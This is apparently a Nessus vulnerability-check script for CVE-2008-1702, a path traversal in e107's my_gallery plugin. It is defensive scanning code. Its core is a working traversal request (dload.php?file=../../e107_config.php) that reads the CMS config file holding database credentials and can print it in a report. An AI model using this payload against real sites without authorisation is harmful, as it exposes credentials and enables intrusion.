#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(31650);
  script_version("$Revision: 1.20 $");
  script_cvs_date("$Date: 2016/11/11 20:08:42 $");

  script_cve_id("CVE-2008-1702");
  script_bugtraq_id(28440);
  script_osvdb_id(43713);
  script_xref(name:"EDB-ID", value:"5308");
  script_xref(name:"Secunia", value:"29493");

  script_name(english:"my_gallery Plugin for e107 dload.php file Parameter Arbitrary File PHP Source Disclosure");
  script_summary(english:"Tries to read a local file");

  script_set_attribute(
    attribute:"synopsis",
    value:
"The remote web server contains a PHP application that is affected by
an information disclosure issue."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The version of My_Gallery, a third-party photo gallery plugin for
e107, installed on the remote host allows an unauthenticated attacker
to download arbitrary files from the affected host."
  );
  script_set_attribute(attribute:"see_also", value:"http://seclists.org/bugtraq/2008/Mar/328");
  script_set_attribute(attribute:"solution", value:"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_cwe_id(20, 22);

  script_set_attribute(attribute:"vuln_publication_date", value:"2008/03/25");
  script_set_attribute(attribute:"plugin_publication_date", value:"2008/03/26");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:e107:e107");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2008-2016 Tenable Network Security, Inc.");

  script_dependencies("e107_detect.nasl");
  script_require_ports("Services/www", 80);
  script_require_keys("www/e107");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("audit.inc");

port = get_http_port(default:80, php:TRUE);

# Test an install.
install = get_install_from_kb(appname:'e107', port:port, exit_on_fail:TRUE);
dir = install['dir'];
install_url = build_url(qs:dir, port:port);

# Try to exploit the issue to read e107's config file.
file = "../../e107_config.php";
url = "/e107_plugins/my_gallery/dload.php?file=" + file;

res = http_send_recv3(
  method : "GET",
  item   : dir + url,
  port   : port,
  exit_on_fail : TRUE
);

# There's a problem if we could get the file.
if (
  ("This file has been generated by the installation script." >< res[2]) ||
  ("$mySQLserver" >< res[2])
)
{
  if (report_verbosity > 0)
  {
    report =
      '\nNessus was able to verify the issue using the following request :' +
      '\n' +
      '\n' + install_url + url +
      '\n';
    if (report_verbosity > 1)
    {
      report =
        '\n' +
        "Here are the contents of e107's config file :" +
        '\n' +
        res[2] + '\n';
      security_warning(port:port, extra:report);
    }
    else security_warning(port);
    exit(0);
  }
}
audit(AUDIT_WEB_APP_NOT_AFFECTED, "e107", install_url);
